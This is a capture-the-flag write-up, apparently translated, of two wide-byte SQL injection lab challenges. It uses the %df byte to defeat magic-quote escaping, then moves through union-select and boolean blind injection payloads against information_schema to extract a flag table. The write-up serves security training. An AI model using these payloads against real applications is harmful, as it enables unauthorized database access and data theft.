Wide byte injection
Principle: Due to the existence of the magic quotation mark function magic_quotes_gpc (switch), it will automatically add a \ in front of the '"\ etc., causing the SQL statement to fail to close. At this time, we need to enter some characters to make the database misjudge and escape characters \ And the sentence we input form a new Chinese character to close the sentence.
first question:
First enter 'and 1=2 %23 in the url bar, and
find that the page has not changed, there may be magic quotation marks, so I add a %df before the' and re-enter the code
%df' and 1=2 --qwe
The query result is not displayed, so it is judged as its echo.
Then, we can use the blind injection method to query the length of its database name first, and enter the code
%df' and length(database())>7 -- qwe
When there is still data, but the input
%df' and length(database())>8 -- qwe
There is no data, it is determined that the length of the database is 8 bytes long
However, I suddenly found that the following query results show the field name, so we directly query the database name, we try to use this string of codes
%df' union select 1,database(),3 -- qwe
Obtain the database name directly.
Next, it is a simple error injection, query the field name directly, and enter the code
%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- qwe
The name of the queried table: china_flag, user
continue to check the column name: but because of the magic quotes, we need to write the table name as hexadecimal
Id, C_Flag
input code
%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x6368696e615f666c6167 -- qwe
Finally, check the flag directly
%df' union select 1,2,(select group_concat(C_flag) from china_flag)-- qwe
zKaQ-Wide, zKaQ-CAIK, zKaQ-Kzj+mz
Question 2: Shooting
range address
Let’s try the universal code first
') or 1=1 -- qwe
Enter code in username
a') or 1=1 -- qwe
At the same time, use the packet capture tool to capture.
At the same time, modify the data in Hex to change 61 representing a to df to form a character with \. Then, the
package
page does not display data, which means that the statement we entered has been executed and its value is determined. The echo is no data, there is wide byte injection,
so we can only
enter the code through blind injection
汉') or length(database())>5 -- qwe
until
汉') or length(database())=8 -- qwe
Determine the length of the database is 8 bytes,
continue to enter the code:
汉') or ascii(substr(database(),1,1))>90 -- qwe
Run out the database name one by one,
but since we don’t need to get the database name next,
we just omit it. We continue to enter the code and query the length of the first table name
汉') or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>10 -- qwe
Find all the table names china_flag in turn and
continue to check the field names:
汉') or ascii(substr((select column_name from information_schema.columns where table_name=0x6368696e615f666c6167 limit 0,1),1,1))>10 -- qwe
Check field names
come first field name string ascii code value is 67
several other characters so
come to the field name C_Flag
Finally check the data,
enter the code
汉') or ascii(substr((select C_Flag from china_flag limit 0,1),1,1))>10 -- qwe
Get the flag zKaQ-Kzj+mz